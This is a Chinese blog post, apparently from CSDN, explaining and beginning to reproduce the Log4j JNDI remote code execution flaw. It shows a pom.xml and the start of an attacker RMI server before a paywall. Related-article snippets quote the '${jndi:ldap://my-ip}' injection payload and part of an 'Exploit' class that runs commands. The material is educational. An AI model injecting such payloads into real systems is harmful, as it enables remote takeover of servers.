log4j远程安全漏洞复现讲解

最新推荐文章于 2024-08-01 21:21:39 发布
原创 最新推荐文章于 2024-08-01 21:21:39 发布 · 593 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #jar #网络

本文通过实例演示了Log4j中存在的一种远程安全漏洞,详细解释了当使用特定版本的Log4j并结合易受攻击的Java配置时,攻击者如何能够利用恶意代码执行任意操作。

这一阵log4j安全问题闹的沸沸扬扬的,我也在纳闷呢什么是远程安全漏洞,怎么就通过log日志打印就出现安全问题呢,看视频,自己想,大概知道什么是什么了

就是说假如黑客有一个自己的服务比如用java写了一个rmi(也是一种通信协议)然后这个服务一直启动,受害者的服务程序呢用log4j打印是一个外部传进来的比如参数,这个时候还用的是有bug版本,并且java版本默认是支持打开rmi协议的,此时就会出现我传进来一个参数,这个参数用ip和端口访问黑客系统,此时就会变成打印log日志就会直接调用黑客的方法并转到自己本地系统执行,也就是说黑客的程序就像是部署我们本地一样,可以获取本地资源,可以写入木马程序等就都是可以的了,所以这就是这个bug的严重性与危害性

废话不多说,把我之前跟周瑜老师视频学习的代码发出来,大家也可以跟着操作一下

首先需要一个rmi服务,这个就代表黑客的服务

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>RmiDemo</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
    </properties>

</project>

然后是能开启rmi服务的代码

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registr
最低0.47元/天 解锁文章
Apache Log4j(CVE-2021-44832)远程代码执行漏洞复现
weixin_43223153的博客
01-03 4253
Apache Log4j(CVE-2021-44832)远程代码执行漏洞复现 1. 漏洞介绍: Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4j2 2.0-beta7 到 2.17.0版本存在安全漏洞,该漏洞源于软件中对于JDBC Appender 和JNDI 缺少有效的防护与过滤。有权修改日志配置文件的攻击者可以构建恶意配置 将 JDBC Appender 与引用 JNDI URI 的数据源一起使用,该 JNDI URI 可以执行远
Log4j远程代码执行漏洞复现尝试
weixin_51194266的博客
06-29 759
log4j漏洞的简单复现
log4j2 远程代码执行漏洞复现(CVE-2021-44228)
最新发布
2301_76631050的博客
08-01 1405
Apache Log4j:Apache的开源项目,一个功能强大的日志组件,提供方便的日志记录Apache Log4j2:对Log4j的升级,它比其前身Log4j1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Loqback架构中的一些问题。优秀的Java日志框架;Log4j2 漏洞受影响版本:2.0到2.14.1版本中存在一处JNDI注入漏洞
Apache log4j远程代码执行漏洞复现
qq_46162550的博客
05-11 2009
Apache log4j远程代码执行漏洞复现(1) 漏洞原理:(2) 漏洞复现环境:(3) 漏洞复现过程: (1) 漏洞原理: Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,lookup会将jndi注入可执行语句执行,程序会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行,从而达成漏
Log4j远程代码执行漏洞(CVE-2021-44228) 漏洞复现
Boom!脑洞大爆炸的博客
07-07 882
Log4j远程代码执行漏洞(CVE-2021-44228) 漏洞复现
漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
2301_76225520的博客
04-18 1338
以及 LDAP即轻量级目录访问协议都是称服务,不同的是 LDAP是一个协议,是和 HTTP 一样是通用的,而不止局限于 JAVA.比如用户对象可以有用户、密码、邮件地址、角色等属性,计算机对象可以有IP地址、MAC地址、操作系统版本等属性。四个系列:< v1.14.2, < v1.13.5, < v1.12.7, < v1.11.6。而用户可以通过目录服务,针对打印机需求,根据分辨率等属性进行搜索获取符合条件的打印机对象。在称服务中根据打印机称获取打印机对象,并进行打印操作。
Log4j2远程命令执行复现
qq_18811919的博客
04-04 771
本篇文章讲解Log4j2的常见利用手法,该漏洞影响的范围非常大在护网中经常会使用重大漏洞Get WebShell后续攻击内网横向移动拿到靶标,后续我会推出李同学红队仿真靶场尽可能的还原护网场景感兴趣的朋友关注下。
log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)
qq_41132792的博客
05-24 9190
纯粹的一个过程复现,小白向,没有复杂的讲解,按照步骤一步步来就可以成功复现了。
【紧急】Log4j又发新版2
2401_84048554的博客
04-18 488
JNDI(Java Naming and Directory Interface,Java和目录接口)是Java中为命和目录服务提供接口的API,JNDI主要由两部分组成:Naming(命)和Directory(目录),其中Naming是指将对象通过唯一标识符绑定到一个上下文Context,同时可通过唯一标识符查找获得对象,而Directory主要指将某一对象的属性绑定到Directory的上下文DirContext中,同时可通过称获取对象的属性,同时也可以操作属性。
Log4j 远程代码执行漏洞解析(CVE-2021-44228)复现
zkaqlaoniao的博客
12-23 861
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。log4j支持JNDI协议。Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 3539
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Log4j漏洞复现
m1287578441的博客
06-08 3086
Log4j漏洞复现
log4j漏洞复现
weixin_45740473的博客
12-23 9419
12 月 10 日凌晨,Apache 开源项目 Log4j远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。 Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。 一、lookup 功能造成的漏洞 Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过
Log4j2 远程代码执行漏洞复现
龙卷风摧毁停车场
12-20 3307
Log4j2.14前版本,漏洞浮现
Log4j2远程代码执行漏洞(cve-2021-44228)复现
citytwilight的博客
05-22 3069
Log4j2远程代码执行漏洞(cve-2021-44228)复现(反弹shell)
Log4j史诗级漏洞,从原理到实战,只用3个实例讲明白
热门推荐
程序新视界
12-13 1万+
背景 最近互联网技术圈最火的一件事莫过于Log4j2的漏洞了。同时也涌现出了各类分析文章,关于漏洞的版本、漏洞的原因、漏洞的修复、程序员因此加班等等。 经常看我文章的朋友都知道,面对这样热门有意思的技术点,怎能错过深入分析一波呢?大概你也已经听说了,造成漏洞的”罪魁祸首“是JNDI,今天我们就聊它。 JNDI,好熟悉,但……熟悉的陌生人?JNDI到底是个什么鬼?好吧,如果你已经有一两年的编程经验,但还不了解JNDI,甚至没听说过。那么,要么赶紧换工作,要么赶紧读读这篇文章。 JNDI是个什么鬼? 说起JND
Log4J 漏洞复现
qq_42307546的博客
12-13 2967
介绍:log4j是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布 log4j存在远程代码执行漏洞,通过lookup来触发漏洞详情参考 https://zhuanlan.zhihu.com/p/444140910 首先我们需要编写一个恶意的类然后编译成class文件 public class Exploit { public Exploit(){ try{ // 要执行的命令 String[] comma
Log4j复现过程
weixin_50339832的博客
12-26 2534
log4j是一个记录日志的组件,用来对程序状态进行动态记录, logger.info("system propety: ${jndi:schema://url}"); jndi:jndi解析器通过jdk获取内容,反序列化为java对象作为jndi, 并打印,jndi就是这个从外部查找得到的java对象。 schema:获取方式,jdk支持多种不同的查找方式,包括 corbname, dns, iiop, iiopname, ldap, ldaps, rmi 因ldap写法简单,被作为常用的获取方式
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值